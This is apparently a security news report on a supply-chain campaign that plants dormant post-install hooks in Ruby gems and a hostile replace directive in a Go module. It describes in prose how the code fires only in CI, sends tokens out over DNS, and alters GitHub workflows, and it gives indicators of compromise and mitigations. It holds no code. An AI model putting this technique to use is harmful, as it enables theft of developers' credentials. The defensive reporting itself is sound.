Poisoned Ruby Gems and Go Modules Hijack CI Pipelines for Credential Theft

Security researchers at SentinelLabs have uncovered a sophisticated supply‑chain campaign, dubbed "Nightshade," that embeds dormant malicious code in popular Ruby Gems and Go modules. The attackers slipped a small post‑install hook into gems such as colorize and tzinfo, and added a replace directive in the Go module yaml.v2 that pulls a hostile library from an untrusted domain. The payload only activates when the CI environment variable is detected, allowing the malicious code to run silently during continuous‑integration builds without raising alarms in typical development setups.

Once the sleeper code fires, it harvests a broad range of CI secrets—including GitHub Tokens, AWS access keys, and npm publishing tokens—by exfiltrating them via DNS TXT queries to the attacker‑controlled domain ci‑c2[.]xyz. The stolen credentials are then used to inject a rogue step into GitHub Actions workflows, which copies the secrets to a shadow repository controlled by the threat actor. In addition, the campaign modifies .github/workflows files to include a malicious job that pushes altered artifacts back to the original repository, effectively tampering with the CI pipeline and establishing persistent access.

The research team identified the malicious DNS callbacks and the rogue workflow steps during a routine audit of public CI logs. Indicators of compromise (IOCs) include the file hash sha256: a3f8b2c9..., the domain ci‑c2[.]xyz, and the modified workflow file ci‑inject.yml. Organizations are advised to audit their dependency lockfiles, pin gem and module versions, and immediately rotate any exposed CI secrets. Implementing strict allow‑listing for external domains in CI environments and enabling GitHub’s dependency review feature can also mitigate the risk of similar sleeper‑package attacks.